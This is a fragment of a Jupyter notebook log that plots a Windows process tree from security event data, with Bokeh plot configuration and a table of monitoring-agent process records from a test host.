\",\"type\":\"Range1d\"},\"value\":-0.2},\"id\":\"1050\",\"type\":\"Dodge\"},{\"attributes\":{\"range\":{\"id\":\"1008\",\"type\":\"Range1d\"},\"value\":0.25},\"id\":\"1064\",\"type\":\"Dodge\"},{\"attributes\":{\"data_source\":{\"id\":\"1002\",\"type\":\"ColumnDataSource\"},\"glyph\":{\"id\":\"1059\",\"type\":\"Text\"},\"hover_glyph\":null,\"muted_glyph\":null,\"nonselection_glyph\":{\"id\":\"1060\",\"type\":\"Text\"},\"selection_glyph\":null,\"view\":{\"id\":\"1062\",\"type\":\"CDSView\"}},\"id\":\"1061\",\"type\":\"GlyphRenderer\"},{\"attributes\":{\"source\":{\"id\":\"1002\",\"type\":\"ColumnDataSource\"}},\"id\":\"1062\",\"type\":\"CDSView\"},{\"attributes\":{},\"id\":\"1044\",\"type\":\"BasicTickFormatter\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.6},\"fill_color\":{\"field\":\"Exe\",\"transform\":{\"id\":\"1035\",\"type\":\"CategoricalColorMapper\"}},\"height\":{\"units\":\"data\",\"value\":0.95},\"line_color\":{\"value\":\"#1f77b4\"},\"width\":{\"units\":\"data\",\"value\":3.5},\"x\":{\"field\":\"Level\",\"transform\":{\"id\":\"1036\",\"type\":\"Dodge\"}},\"y\":{\"field\":\"Row\"}},\"id\":\"1038\",\"type\":\"Rect\"},{\"attributes\":{\"text\":{\"field\":\"PID\"},\"text_baseline\":\"middle\",\"text_color\":{\"value\":\"black\"},\"text_font_size\":{\"value\":\"8pt\"},\"x\":{\"field\":\"Level\",\"transform\":{\"id\":\"1063\",\"type\":\"Dodge\"}},\"y\":{\"field\":\"Row\",\"transform\":{\"id\":\"1064\",\"type\":\"Dodge\"}}},\"id\":\"1066\",\"type\":\"Text\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.1},\"fill_color\":{\"value\":\"#1f77b4\"},\"height\":{\"units\":\"data\",\"value\":0.95},\"line_alpha\":{\"value\":0.1},\"line_color\":{\"value\":\"#1f77b4\"},\"width\":{\"units\":\"data\",\"value\":3.5},\"x\":{\"field\":\"Level\",\"transform\":{\"id\":\"1036\",\"type\":\"Dodge\"}},\"y\":{\"field\":\"Row\"}},\"id\":\"1039\",\"type\":\"Rect\"},{\"attributes\":{},\"id\":\"1137\",\"type\":\"StringEditor\"},{\"attributes\":{\"range\":{\"id\":\"1006\",\"type\":\"Range1d\"},\"value\":0.1},\"id\":\"1049\",\"type\":\"Dodge\"},{\"attributes\":{\"active_drag\":\"auto\",\"active_inspect\":\"auto\",\"active_multi\":null,\"active_scroll\":\"auto\",\"active_tap\":\"auto\",\"tools\":[{\"id\":\"1024\",\"type\":\"PanTool\"},{\"id\":\"1025\",\"type\":\"ResetTool\"},{\"id\":\"1026\",\"type\":\"SaveTool\"},{\"id\":\"1027\",\"type\":\"TapTool\"},{\"id\":\"1033\",\"type\":\"HoverTool\"}]},\"id\":\"1028\",\"type\":\"Toolbar\"},{\"attributes\":{\"text\":{\"field\":\"PID\"},\"text_alpha\":{\"value\":0.1},\"text_baseline\":\"middle\",\"text_color\":{\"value\":\"black\"},\"text_font_size\":{\"value\":\"8pt\"},\"x\":{\"field\":\"Level\",\"transform\":{\"id\":\"1063\",\"type\":\"Dodge\"}},\"y\":{\"field\":\"Row\",\"transform\":{\"id\":\"1064\",\"type\":\"Dodge\"}}},\"id\":\"1067\",\"type\":\"Text\"},{\"attributes\":{\"below\":[{\"id\":\"1083\",\"type\":\"LinearAxis\"}],\"center\":[{\"id\":\"1087\",\"type\":\"Grid\"},{\"id\":\"1092\",\"type\":\"Grid\"}],\"left\":[{\"id\":\"1088\",\"type\":\"LinearAxis\"}],\"plot_height\":700,\"plot_width\":90,\"renderers\":[{\"id\":\"1110\",\"type\":\"GlyphRenderer\"}],\"title\":{\"id\":\"1135\",\"type\":\"Title\"},\"toolbar\":{\"id\":\"1099\",\"type\":\"Toolbar\"},\"x_range\":{\"id\":\"1075\",\"type\":\"DataRange1d\"},\"x_scale\":{\"id\":\"1079\",\"type\":\"LinearScale\"},\"y_range\":{\"id\":\"1077\",\"type\":\"Range1d\"},\"y_scale\":{\"id\":\"1081\",\"type\":\"LinearScale\"}},\"id\":\"1074\",\"subtype\":\"Figure\",\"type\":\"Plot\"},{\"attributes\":{\"data_source\":{\"id\":\"1002\",\"type\":\"ColumnDataSource\"},\"glyph\":{\"id\":\"1066\",\"type\":\"Text\"},\"hover_glyph\":null,\"muted_glyph\":null,\"nonselection_glyph\":{\"id\":\"1067\",\"type\":\"Text\"},\"selection_glyph\":null,\"view\":{\"id\":\"1069\",\"type\":\"CDSView\"}},\"id\":\"1068\",\"type\":\"GlyphRenderer\"},{\"attributes\":{\"text\":{\"field\":\"cmd\"},\"text_alpha\":{\"value\":0.1},\"text_baseline\":\"middle\",\"text_color\":{\"value\":\"black\"},\"text_font_size\":{\"value\":\"7pt\"},\"x\":{\"field\":\"Level\",\"transform\":{\"id\":\"1049\",\"type\":\"Dodge\"}},\"y\":{\"field\":\"Row\",\"transform\":{\"id\":\"1050\",\"type\":\"Dodge\"}}},\"id\":\"1053\",\"type\":\"Text\"},{\"attributes\":{\"source\":{\"id\":\"1002\",\"type\":\"ColumnDataSource\"}},\"id\":\"1069\",\"type\":\"CDSView\"},{\"attributes\":{},\"id\":\"1046\",\"type\":\"BasicTickFormatter\"},{\"attributes\":{\"editor\":{\"id\":\"1141\",\"type\":\"StringEditor\"},\"field\":\"SubjectLogonId\",\"formatter\":{\"id\":\"1142\",\"type\":\"StringFormatter\"},\"title\":\"SubjectLogonId\"},\"id\":\"1122\",\"type\":\"TableColumn\"},{\"attributes\":{\"callback\":null},\"id\":\"1075\",\"type\":\"DataRange1d\"},{\"attributes\":{\"editor\":{\"id\":\"1139\",\"type\":\"StringEditor\"},\"field\":\"SubjectUserSid\",\"formatter\":{\"id\":\"1140\",\"type\":\"StringFormatter\"},\"title\":\"SubjectUserSid\"},\"id\":\"1121\",\"type\":\"TableColumn\"},{\"attributes\":{\"ticks\":[1,2,3,4,5,6,7]},\"id\":\"1072\",\"type\":\"FixedTicker\"},{\"attributes\":{\"formatter\":{\"id\":\"1163\",\"type\":\"BasicTickFormatter\"},\"ticker\":{\"id\":\"1084\",\"type\":\"BasicTicker\"},\"visible\":false},\"id\":\"1083\",\"type\":\"LinearAxis\"},{\"attributes\":{\"editor\":{\"id\":\"1147\",\"type\":\"StringEditor\"},\"field\":\"CommandLine\",\"formatter\":{\"id\":\"1148\",\"type\":\"StringFormatter\"},\"title\":\"CommandLine\"},\"id\":\"1125\",\"type\":\"TableColumn\"},{\"attributes\":{\"ticks\":[1,2,3,4,5,6,7]},\"id\":\"1070\",\"type\":\"FixedTicker\"},{\"attributes\":{\"range\":{\"id\":\"1006\",\"type\":\"Range1d\"},\"value\":0.1},\"id\":\"1056\",\"type\":\"Dodge\"},{\"attributes\":{\"editor\":{\"id\":\"1143\",\"type\":\"StringEditor\"},\"field\":\"NewProcessId\",\"formatter\":{\"id\":\"1144\",\"type\":\"StringFormatter\"},\"title\":\"NewProcessId\"},\"id\":\"1123\",\"type\":\"TableColumn\"},{\"attributes\":{\"range\":{\"id\":\"1006\",\"type\":\"Range1d\"},\"value\":1.75},\"id\":\"1036\",\"type\":\"Dodge\"},{\"attributes\":{\"callback\":null,\"end\":1011,\"start\":-1},\"id\":\"1077\",\"type\":\"Range1d\"},{\"attributes\":{\"editor\":{\"id\":\"1145\",\"type\":\"StringEditor\"},\"field\":\"NewProcessName\",\"formatter\":{\"id\":\"1146\",\"type\":\"StringFormatter\"},\"title\":\"NewProcessName\"},\"id\":\"1124\",\"type\":\"TableColumn\"},{\"attributes\":{\"children\":[{\"id\":\"1003\",\"subtype\":\"Figure\",\"type\":\"Plot\"},{\"id\":\"1074\",\"subtype\":\"Figure\",\"type\":\"Plot\"}]},\"id\":\"1131\",\"type\":\"Row\"},{\"attributes\":{},\"id\":\"1079\",\"type\":\"LinearScale\"},{\"attributes\":{\"editor\":{\"id\":\"1149\",\"type\":\"StringEditor\"},\"field\":\"ProcessId\",\"formatter\":{\"id\":\"1150\",\"type\":\"StringFormatter\"},\"title\":\"ProcessId\"},\"id\":\"1126\",\"type\":\"TableColumn\"},{\"attributes\":{\"callback\":null},\"id\":\"1027\",\"type\":\"TapTool\"},{\"attributes\":{\"editor\":{\"id\":\"1151\",\"type\":\"StringEditor\"},\"field\":\"ParentProcessName\",\"formatter\":{\"id\":\"1152\",\"type\":\"StringFormatter\"},\"title\":\"ParentProcessName\"},\"id\":\"1127\",\"type\":\"TableColumn\"},{\"attributes\":{},\"id\":\"1081\",\"type\":\"LinearScale\"},{\"attributes\":{},\"id\":\"1026\",\"type\":\"SaveTool\"},{\"attributes\":{\"editor\":{\"id\":\"1153\",\"type\":\"StringEditor\"},\"field\":\"TargetLogonId\",\"formatter\":{\"id\":\"1154\",\"type\":\"StringFormatter\"},\"title\":\"TargetLogonId\"},\"id\":\"1128\",\"type\":\"TableColumn\"},{\"attributes\":{\"format\":\"%F %T\"},\"id\":\"1117\",\"type\":\"DateFormatter\"},{\"attributes\":{\"dimensions\":\"height\"},\"id\":\"1024\",\"type\":\"PanTool\"},{\"attributes\":{\"source\":{\"id\":\"1002\",\"type\":\"ColumnDataSource\"}},\"id\":\"1130\",\"type\":\"CDSView\"},{\"attributes\":{},\"id\":\"1025\",\"type\":\"ResetTool\"},{\"attributes\":{},\"id\":\"1084\",\"type\":\"BasicTicker\"},{\"attributes\":{\"grid_line_color\":null,\"ticker\":{\"id\":\"1084\",\"type\":\"BasicTicker\"}},\"id\":\"1087\",\"type\":\"Grid\"},{\"attributes\":{},\"id\":\"1089\",\"type\":\"BasicTicker\"},{\"attributes\":{\"dimension\":1,\"grid_line_color\":\"navy\",\"ticker\":{\"id\":\"1020\",\"type\":\"BasicTicker\"},\"visible\":false},\"id\":\"1023\",\"type\":\"Grid\"},{\"attributes\":{\"formatter\":{\"id\":\"1161\",\"type\":\"BasicTickFormatter\"},\"ticker\":{\"id\":\"1089\",\"type\":\"BasicTicker\"},\"visible\":false},\"id\":\"1088\",\"type\":\"LinearAxis\"},{\"attributes\":{\"callback\":null,\"formatters\":{\"TimeGenerated\":\"datetime\"},\"renderers\":[{\"id\":\"1040\",\"type\":\"GlyphRenderer\"}],\"tooltips\":[[\"Process\",\"@NewProcessName\"],[\"PID\",\"@PID\"],[\"CmdLine\",\"@CommandLine\"],[\"SubjUser\",\"@SubjectUserName\"],[\"SubjLgnId\",\"@SubjectLogonId\"],[\"TargLgnId\",\"@TargetLogonId\"],[\"Time\",\"@TimeGenerated{%F %T}\"]]},\"id\":\"1033\",\"type\":\"HoverTool\"},{\"attributes\":{\"active_drag\":\"auto\",\"active_inspect\":\"auto\",\"active_multi\":{\"id\":\"1112\",\"type\":\"RangeTool\"},\"active_scroll\":\"auto\",\"active_tap\":\"auto\",\"tools\":[{\"id\":\"1093\",\"type\":\"PanTool\"},{\"id\":\"1094\",\"type\":\"WheelZoomTool\"},{\"id\":\"1095\",\"type\":\"BoxZoomTool\"},{\"id\":\"1096\",\"type\":\"SaveTool\"},{\"id\":\"1097\",\"type\":\"ResetTool\"},{\"id\":\"1098\",\"type\":\"HelpTool\"},{\"id\":\"1112\",\"type\":\"RangeTool\"}]},\"id\":\"1099\",\"type\":\"Toolbar\"},{\"attributes\":{\"text\":\"\"},\"id\":\"1135\",\"type\":\"Title\"},{\"attributes\":{\"dimension\":1,\"grid_line_color\":null,\"ticker\":{\"id\":\"1089\",\"type\":\"BasicTicker\"}},\"id\":\"1092\",\"type\":\"Grid\"},{\"attributes\":{},\"id\":\"1142\",\"type\":\"StringFormatter\"},{\"attributes\":{},\"id\":\"1141\",\"type\":\"StringEditor\"},{\"attributes\":{\"factors\":[\"conhost.exe\",\"csc.exe\",\"rundll32.exe\",\"MsMpEng.exe\",\"UsoClient.exe\",\"wsqmcons.exe\",\"lodctr.exe\",\"reg.exe\",\"taskhostw.exe\",\"cmd.exe\",\"InstallAgent.exe\",\"GoogleUpdate.exe\",\"powershell.exe\",\"MOFWriter.exe\",\"suchost.exe\",\"wermgr.exe\",\"cacls.exe\",\"WerFault.exe\",\"cvtres.exe\",\"appidcertstorecheck.exe\",\"WMIADAP.exe\",\"MonitoringHost.exe\",\"wuauclt.exe\",\"cscript.exe\",\"PING.EXE\",\"Microsoft.Sirona.OMS.Security.BaselineAssessment.exe\",\"WmiPrvSE.exe\",\"WaSecAgentProv.exe\",\"svchost.exe\",\"SpeechModelDownload.exe\",\"MOMPerfSnapshotHelper.exe\",\"unlodctr.exe\",\"CompatTelRunner.exe\",\"WaAppAgent.exe\",\"sppsvc.exe\",\"CollectGuestLogs.exe\",\"AppHostRegistrationVerifier.exe\",\"MpCmdRun.exe\",\"dllhost.exe\",\"WmiApSrv.exe\",\"ASMHost.exe\",\"pmfexe.exe\",\"AM_Delta.exe\",\"MpSigStub.exe\",\"DeviceCensus.exe\",\"DscRun.exe\",\"netcfg.exe\",\"mpam-d3ea18d4.exe\",\"SecEdit.exe\",\"services.exe\"],\"palette\":[\"#440154\",\"#45085B\",\"#470F62\",\"#471669\",\"#481D6F\",\"#472575\",\"#472B7A\",\"#46317E\",\"#443781\",\"#423D84\",\"#404487\",\"#3D4A89\",\"#3B508A\",\"#39558B\",\"#365A8C\",\"#33608D\",\"#31658D\",\"#2F6A8D\",\"#2D6F8E\",\"#2B748E\",\"#287A8E\",\"#277E8E\",\"#25838D\",\"#23888D\",\"#218C8D\",\"#1F928C\",\"#1E978A\",\"#1E9B89\",\"#1EA087\",\"#20A585\",\"#24AA82\",\"#29AF7F\",\"#2FB37B\",\"#36B877\",\"#3EBC73\",\"#49C16D\",\"#53C567\",\"#5EC961\",\"#69CC5B\",\"#74D054\",\"#83D34B\",\"#90D643\",\"#9DD93A\",\"#AADB32\",\"#B7DD29\",\"#C7E01F\",\"#D4E11A\",\"#E1E318\",\"#EEE51B\",\"#FDE724\"]},\"id\":\"1035\",\"type\":\"CategoricalColorMapper\"},{\"attributes\":{\"grid_line_alpha\":0.1,\"grid_line_color\":\"navy\",\"minor_grid_line_alpha\":0.1,\"minor_grid_line_color\":\"navy\",\"ticker\":{\"id\":\"1072\",\"type\":\"FixedTicker\"}},\"id\":\"1018\",\"type\":\"Grid\"},{\"attributes\":{},\"id\":\"1140\",\"type\":\"StringFormatter\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.1},\"fill_color\":{\"value\":\"#1f77b4\"},\"height\":{\"units\":\"data\",\"value\":0.8},\"line_alpha\":{\"value\":0.1},\"line_color\":{\"value\":\"#1f77b4\"},\"width\":{\"units\":\"data\",\"value\":1.2},\"x\":{\"field\":\"Level\",\"transform\":{\"id\":\"1106\",\"type\":\"Dodge\"}},\"y\":{\"field\":\"Row\"}},\"id\":\"1109\",\"type\":\"Rect\"},{\"attributes\":{\"below\":[{\"id\":\"1014\",\"type\":\"LinearAxis\"}],\"center\":[{\"id\":\"1018\",\"type\":\"Grid\"},{\"id\":\"1023\",\"type\":\"Grid\"},{\"id\":\"1047\",\"type\":\"Legend\"}],\"left\":[{\"id\":\"1019\",\"type\":\"LinearAxis\"}],\"outline_line_color\":{\"value\":null},\"plot_height\":700,\"plot_width\":900,\"renderers\":[{\"id\":\"1040\",\"type\":\"GlyphRenderer\"},{\"id\":\"1054\",\"type\":\"GlyphRenderer\"},{\"id\":\"1061\",\"type\":\"GlyphRenderer\"},{\"id\":\"1068\",\"type\":\"GlyphRenderer\"}],\"title\":{\"id\":\"1004\",\"type\":\"Title\"},\"toolbar\":{\"id\":\"1028\",\"type\":\"Toolbar\"},\"toolbar_location\":\"above\",\"x_range\":{\"id\":\"1006\",\"type\":\"Range1d\"},\"x_scale\":{\"id\":\"1010\",\"type\":\"LinearScale\"},\"y_range\":{\"id\":\"1008\",\"type\":\"Range1d\"},\"y_scale\":{\"id\":\"1012\",\"type\":\"LinearScale\"}},\"id\":\"1003\",\"subtype\":\"Figure\",\"type\":\"Plot\"},{\"attributes\":{\"axis_line_color\":{\"value\":null},\"formatter\":{\"id\":\"1044\",\"type\":\"BasicTickFormatter\"},\"major_label_standoff\":0,\"major_tick_line_color\":{\"value\":\"navy\"},\"ticker\":{\"id\":\"1020\",\"type\":\"BasicTicker\"},\"visible\":false},\"id\":\"1019\",\"type\":\"LinearAxis\"},{\"attributes\":{},\"id\":\"1143\",\"type\":\"StringEditor\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.6},\"fill_color\":{\"field\":\"Exe\",\"transform\":{\"id\":\"1035\",\"type\":\"CategoricalColorMapper\"}},\"height\":{\"units\":\"data\",\"value\":0.8},\"line_color\":{\"value\":\"#1f77b4\"},\"width\":{\"units\":\"data\",\"value\":1.2},\"x\":{\"field\":\"Level\",\"transform\":{\"id\":\"1106\",\"type\":\"Dodge\"}},\"y\":{\"field\":\"Row\"}},\"id\":\"1108\",\"type\":\"Rect\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.2},\"fill_color\":{\"value\":\"navy\"},\"level\":\"overlay\",\"line_alpha\":{\"value\":1.0},\"line_color\":{\"value\":\"black\"},\"line_dash\":[2,2],\"line_width\":{\"value\":0.5}},\"id\":\"1113\",\"type\":\"BoxAnnotation\"},{\"attributes\":{},\"id\":\"1144\",\"type\":\"StringFormatter\"},{\"attributes\":{},\"id\":\"1093\",\"type\":\"PanTool\"},{\"attributes\":{},\"id\":\"1094\",\"type\":\"WheelZoomTool\"},{\"attributes\":{},\"id\":\"1145\",\"type\":\"StringEditor\"},{\"attributes\":{\"overlay\":{\"id\":\"1165\",\"type\":\"BoxAnnotation\"}},\"id\":\"1095\",\"type\":\"BoxZoomTool\"},{\"attributes\":{},\"id\":\"1020\",\"type\":\"BasicTicker\"},{\"attributes\":{},\"id\":\"1096\",\"type\":\"SaveTool\"},{\"attributes\":{},\"id\":\"1146\",\"type\":\"StringFormatter\"},{\"attributes\":{},\"id\":\"1098\",\"type\":\"HelpTool\"},{\"attributes\":{},\"id\":\"1147\",\"type\":\"StringEditor\"},{\"attributes\":{},\"id\":\"1097\",\"type\":\"ResetTool\"},{\"attributes\":{},\"id\":\"1012\",\"type\":\"LinearScale\"},{\"attributes\":{},\"id\":\"1148\",\"type\":\"StringFormatter\"},{\"attributes\":{\"axis_line_color\":{\"value\":null},\"formatter\":{\"id\":\"1046\",\"type\":\"BasicTickFormatter\"},\"major_label_standoff\":0,\"major_tick_line_color\":{\"value\":\"navy\"},\"ticker\":{\"id\":\"1070\",\"type\":\"FixedTicker\"},\"visible\":false},\"id\":\"1014\",\"type\":\"LinearAxis\"},{\"attributes\":{},\"id\":\"1149\",\"type\":\"StringEditor\"},{\"attributes\":{},\"id\":\"1010\",\"type\":\"LinearScale\"},{\"attributes\":{\"overlay\":{\"id\":\"1113\",\"type\":\"BoxAnnotation\"},\"x_range\":null,\"y_range\":{\"id\":\"1008\",\"type\":\"Range1d\"}},\"id\":\"1112\",\"type\":\"RangeTool\"},{\"attributes\":{},\"id\":\"1150\",\"type\":\"StringFormatter\"},{\"attributes\":{\"source\":{\"id\":\"1002\",\"type\":\"ColumnDataSource\"}},\"id\":\"1041\",\"type\":\"CDSView\"},{\"attributes\":{},\"id\":\"1151\",\"type\":\"StringEditor\"},{\"attributes\":{\"columns\":[{\"id\":\"1118\",\"type\":\"TableColumn\"},{\"id\":\"1120\",\"type\":\"TableColumn\"},{\"id\":\"1121\",\"type\":\"TableColumn\"},{\"id\":\"1122\",\"type\":\"TableColumn\"},{\"id\":\"1123\",\"type\":\"TableColumn\"},{\"id\":\"1124\",\"type\":\"TableColumn\"},{\"id\":\"1125\",\"type\":\"TableColumn\"},{\"id\":\"1126\",\"type\":\"TableColumn\"},{\"id\":\"1127\",\"type\":\"TableColumn\"},{\"id\":\"1128\",\"type\":\"TableColumn\"}],\"height\":150,\"source\":{\"id\":\"1002\",\"type\":\"ColumnDataSource\"},\"view\":{\"id\":\"1130\",\"type\":\"CDSView\"},\"width\":950},\"id\":\"1129\",\"type\":\"DataTable\"},{\"attributes\":{\"data_source\":{\"id\":\"1002\",\"type\":\"ColumnDataSource\"},\"glyph\":{\"id\":\"1108\",\"type\":\"Rect\"},\"hover_glyph\":null,\"muted_glyph\":null,\"nonselection_glyph\":{\"id\":\"1109\",\"type\":\"Rect\"},\"selection_glyph\":null,\"view\":{\"id\":\"1111\",\"type\":\"CDSView\"}},\"id\":\"1110\",\"type\":\"GlyphRenderer\"},{\"attributes\":{},\"id\":\"1152\",\"type\":\"StringFormatter\"},{\"attributes\":{\"source\":{\"id\":\"1002\",\"type\":\"ColumnDataSource\"}},\"id\":\"1111\",\"type\":\"CDSView\"},{\"attributes\":{},\"id\":\"1153\",\"type\":\"StringEditor\"},{\"attributes\":{},\"id\":\"1154\",\"type\":\"StringFormatter\"},{\"attributes\":{\"range\":null,\"value\":-0.5},\"id\":\"1106\",\"type\":\"Dodge\"},{\"attributes\":{},\"id\":\"1155\",\"type\":\"Selection\"},{\"attributes\":{\"text\":\"ProcessTree\"},\"id\":\"1004\",\"type\":\"Title\"},{\"attributes\":{\"callback\":null,\"end\":1011,\"start\":990},\"id\":\"1008\",\"type\":\"Range1d\"},{\"attributes\":{},\"id\":\"1156\",\"type\":\"UnionRenderers\"},{\"attributes\":{\"editor\":{\"id\":\"1136\",\"type\":\"StringEditor\"},\"field\":\"TimeGenerated\",\"formatter\":{\"id\":\"1117\",\"type\":\"DateFormatter\"},\"title\":\"TimeGenerated\"},\"id\":\"1118\",\"type\":\"TableColumn\"},{\"attributes\":{\"editor\":{\"id\":\"1137\",\"type\":\"StringEditor\"},\"field\":\"SubjectUserName\",\"formatter\":{\"id\":\"1138\",\"type\":\"StringFormatter\"},\"title\":\"SubjectUserName\"},\"id\":\"1120\",\"type\":\"TableColumn\"},{\"attributes\":{\"callback\":null,\"end\":10,\"start\":1},\"id\":\"1006\",\"type\":\"Range1d\"}],\"root_ids\":[\"1132\"]},\"title\":\"Bokeh Application\",\"version\":\"1.4.0\"}};\n var render_items = [{\"docid\":\"5635a785-c54a-48f1-a6d1-7fb099a1d973\",\"roots\":{\"1132\":\"81fddc03-103b-4116-8b3d-8c51c88e70df\"}}];\n root.Bokeh.embed.embed_items_notebook(docs_json, render_items);\n\n }\n if (root.Bokeh !== undefined) {\n embed_document(root);\n } else {\n var attempts = 0;\n var timer = setInterval(function(root) {\n if (root.Bokeh !== undefined) {\n clearInterval(timer);\n embed_document(root);\n } else {\n attempts++;\n if (attempts > 100) {\n clearInterval(timer);\n console.log(\"Bokeh: ERROR: Unable to run BokehJS code because BokehJS library is missing\");\n }\n }\n }, 10, root)\n }\n})(window);", "application/vnd.bokehjs_exec.v0+json": "" }, "metadata": { "application/vnd.bokehjs_exec.v0+json": { "id": "1132" } }, "output_type": "display_data" } ], "persistentId": "56ffc00b-0809-4b5f-b6b9-bec57f7e8332", "text": "assert len(ptutil.get_roots(p_tree)) == 10\ns_tree = ptutil.get_descendents(p_tree, ptutil.get_roots(p_tree).iloc[4])\nptplot.plot_tree(data=p_tree, legend_col=\"Exe\")" }, "executionTime": "2019-12-13T20:27:51.773Z" }, { "cell": { "executionCount": 5, "executionEventId": "a3e7c24b-a363-4dfd-a80b-e9505226b6ce", "hasError": false, "id": "5610ff3a-83b0-4253-92bb-feba160df533", "outputs": [ { "data": { "text/html": "
\n\n\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n
TenantIdAccountEventIDTimeGeneratedComputerSubjectUserSidSubjectUserNameSubjectDomainNameSubjectLogonIdNewProcessId...source_index_parProcessId_parNewProcessName_parTimeGenerated_orig_parparent_keyIsRootIsLeafIsBranchpathparent_index
proc_key
c:\\program files\\microsoft monitoring agent\\agent\\monitoringhost.exe0x8641970-01-01 00:00:00.00000052b1ab41-869e-4138-9e40-2a4457f09bf0NaN46881970-01-01 00:00:00.000MSTICAlertsWin1NaNNaNNaN0x3e70x864...NaNNaNNaNNaTNaNTrueFalseFalse1004NaN
c:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf\\desiredstateconfiguration\\dscrun.exe0x8dc2019-02-09 21:02:56.25700052b1ab41-869e-4138-9e40-2a4457f09bf0WORKGROUP\\MSTICAlertsWin1$46882019-02-09 21:02:56.257MSTICAlertsWin1S-1-5-18MSTICAlertsWin1$WORKGROUP0x3e70x8dc...NaNNaNNaN1970-01-01 00:00:00.000000000c:\\program files\\microsoft monitoring agent\\ag...FalseFalseTrue1004/101004
c:\\windows\\system32\\conhost.exe0x183c2019-02-09 21:02:56.27300052b1ab41-869e-4138-9e40-2a4457f09bf0WORKGROUP\\MSTICAlertsWin1$46882019-02-09 21:02:56.273MSTICAlertsWin1S-1-5-18MSTICAlertsWin1$WORKGROUP0x3e70x183c...998.00x864C:\\Program Files\\Microsoft Monitoring Agent\\Ag...2019-02-09 21:02:56.256999936c:\\program files\\microsoft monitoring agent\\ag...FalseTrueFalse1004/10/1110
c:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf-64\\desiredstateconfiguration\\dscrun.exe0xd742019-02-09 23:22:56.25700052b1ab41-869e-4138-9e40-2a4457f09bf0WORKGROUP\\MSTICAlertsWin1$46882019-02-09 23:22:56.257MSTICAlertsWin1S-1-5-18MSTICAlertsWin1$WORKGROUP0x3e70xd74...NaNNaNNaN1970-01-01 00:00:00.000000000c:\\program files\\microsoft monitoring agent\\ag...FalseFalseTrue1004/1071004
c:\\windows\\system32\\conhost.exe0x21c82019-02-09 23:22:56.26700052b1ab41-869e-4138-9e40-2a4457f09bf0WORKGROUP\\MSTICAlertsWin1$46882019-02-09 23:22:56.267MSTICAlertsWin1S-1-5-18MSTICAlertsWin1$WORKGROUP0x3e70x21c8...749.00x864C:\\Program Files\\Microsoft Monitoring Agent\\Ag...2019-02-09 23:22:56.256999936c:\\program files\\microsoft monitoring agent\\ag...FalseTrueFalse1004/107/108107
c:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf\\desiredstateconfiguration\\dscrun.exe0x6f82019-02-09 23:32:56.26000052b1ab41-869e-4138-9e40-2a4457f09bf0WORKGROUP\\MSTICAlertsWin1$46882019-02-09 23:32:56.260MSTICAlertsWin1S-1-5-18MSTICAlertsWin1$WORKGROUP0x3e70x6f8...NaNNaNNaN1970-01-01 00:00:00.000000000c:\\program files\\microsoft monitoring agent\\ag...FalseFalseTrue1004/1201004
c:\\windows\\system32\\conhost.exe0x1c242019-02-09 23:32:56.28000052b1ab41-869e-4138-9e40-2a4457f09bf0WORKGROUP\\MSTICAlertsWin1$46882019-02-09 23:32:56.280MSTICAlertsWin1S-1-5-18MSTICAlertsWin1$WORKGROUP0x3e70x1c24...883.00x864C:\\Program Files\\Microsoft Monitoring Agent\\Ag...2019-02-09 23:32:56.260000000c:\\program files\\microsoft monitoring agent\\ag...FalseTrueFalse1004/120/121120
